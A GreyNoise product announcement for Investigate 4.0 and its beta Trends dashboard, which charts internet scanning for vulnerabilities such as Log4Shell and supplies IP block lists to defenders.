Defending Against Emerging Threats with GreyNoise Investigate 4.0

New GreyNoise Trends dashboard helps security analysts identify and respond to opportunistic “exploit” attacks

The increasing frequency of internet-wide exploit attacks targeting newly announced vulnerabilities is a tremendous challenge for security teams. There is a long line of “celebrity vulnerabilities” that we at GreyNoise have observed with increasing alarm. And given our focus on internet noise, customers have naturally been asking for our help in providing visibility into vulnerabilities being actively exploited in the wild.

This is why we created GreyNoise Trends, a new view into the GreyNoise data set to help security analysts identify and respond to internet attacks targeting specific vulnerabilities.

New Vulnerabilities Create A Race Against Time for Security Teams

When a new vulnerability is discovered and announced, it's a race against time to see who can find vulnerable servers first. For example, when the Apache Log4j vulnerability (CVE-2021-44228, aka “Log4Shell”) was announced on December 5, 2021, GreyNoise saw a dramatic spike in internet-wide scanning activity searching for servers that exposed this vulnerability:

Figure: Log4Shell Unique IPs per hour, Source: GreyNoise Research

Note that thousands of unique IP addresses searching for a vulnerability can generate billions or trillions of connection requests across the internet, generating a storm of internet noise that makes it difficult to identify true threats.

For security teams, responding to this kind of event is extremely challenging. Under pressure of a newly announced vulnerability, they need to understand how serious the vulnerability is, whether it is being actively exploited in the wild, whether they are vulnerable, and whether they may have already been compromised. And if they have vulnerable systems, they need to patch them on an emergency basis.

Vulnerability Exploits Used in 34% of Cyber Attacks in 2021

According to a recent report by IBM, severe vulnerabilities in internet-facing enterprise software are being exploited and weaponized at a higher frequency, at massive scale:

  • 34% of attacks in 2021 used vulnerability exploitation - opportunistic “scan-and-exploit” attacks are quickly approaching phishing as the most-used cyber attack vector, with 34% of attacks leveraging vulnerabilities, compared to 41% of attacks leveraging phishing.
  • Vulnerability exploit attacks grew 33% year over year in 2021 - the number of incidents that were caused by vulnerability exploitation this past year rose 33% from 2020, indicating this attack vector’s strong hold in threat actors’ arsenals.

Furthermore, the amount of time between disclosure of a new vulnerability and the start of active exploitation has been reduced to a matter of hours, leaving defenders with less time to react and respond.

GreyNoise Investigate - Real-Time Visibility and Blocking of Exploit Attacks

GreyNoise Investigate helps security analysts identify and respond to opportunistic “scan-and-exploit” attacks, providing context about the behavior and intent of IP addresses scanning the internet. Investigate allows security teams to:

  • Quickly triage alerts based on malicious, benign, or targeted classifications
  • Identify trending internet attacks targeting specific vulnerabilities and CVEs
  • Block and hunt for IP addresses opportunistically attacking a specific vulnerability

With the release of Investigate 4.0, GreyNoise has created a new Trends page that helps security analysts identify and respond to internet attacks targeting specific vulnerabilities. This new page provides two key capabilities:

  • Attack Trend Visibility - the Trends graph shows the number of IP addresses targeting a specific vulnerability or CVE over time. This unique visualization allows security teams to identify and prioritize internet threats based on how actively a vulnerability is being exploited in the wild.
  • Dynamic IP lists - the new Trends page provides several ways for analysts to access a dynamic list of IP addresses actively scanning for a vulnerability in the past 24 hours. This data can be used to provide near-term protection by blocking attacks at the firewall or WAF, as well as providing indicators of compromise to use to hunt for potentially compromised systems.

Taken together, this new Trends functionality allows security teams to quickly understand if a vulnerability is relevant to their organization, and to buy them the time they need to put security defenses in place.


Figure: GreyNoise Investigate 4.0 showing Attack Trends graph for the Apache Log4j vulnerability (CVE CVE-2021-44228)

GreyNoise Trends for Community Accounts

Note that GreyNoise continues to be committed to supporting the broader security community via our free Community plan, and this new GreyNoise Trends functionality is included. Community members will be able to subscribe to a single tag to export the Dynamic IP list.

In addition, for severe vulnerabilities with global impact, GreyNoise will selectively make the full functionality of the paid Trends page available to ANYONE who wants to take advantage of it, including both attack visibility and dynamic IP lists.

Try GreyNoise Trends For Yourself, And Tell Us What You Think

One important note about GreyNoise Trends - we’ve launched this new capability as Beta code, for several reasons:

  • Potential bugs and stability - we made the decision to build and launch this new capability after analyzing our experience during the Apache Log4j vulnerability event in late December. Over the past two months, our engineering team has been working hard to build out this new functionality. If you notice any issues or have questions about functionality, please do not hesitate to reach out to our team: support@greynoise.io
  • Learning - we realize that we need to learn more about how analysts and others will use this new, never-before-seen functionality. We’ve made our best guess about how to package this functionality into our Community and Investigate plans, but we know there are things we don’t know.
  • Roadmap - finally, we have a number of ideas about where we think we should take this capability in the future, but we need your help and guidance to shape this direction. If you’re interested in participating in this “futures'' discussion, please join us at our 3rd Open Forum on March 17 at 11am ET. You can register to attend here.

So please, sign up for a free GreyNoise Community account if you don’t already have one, try out GreyNoise Trends, and let us know what you think. And to get you started, here are a few interesting Trends pages to check out: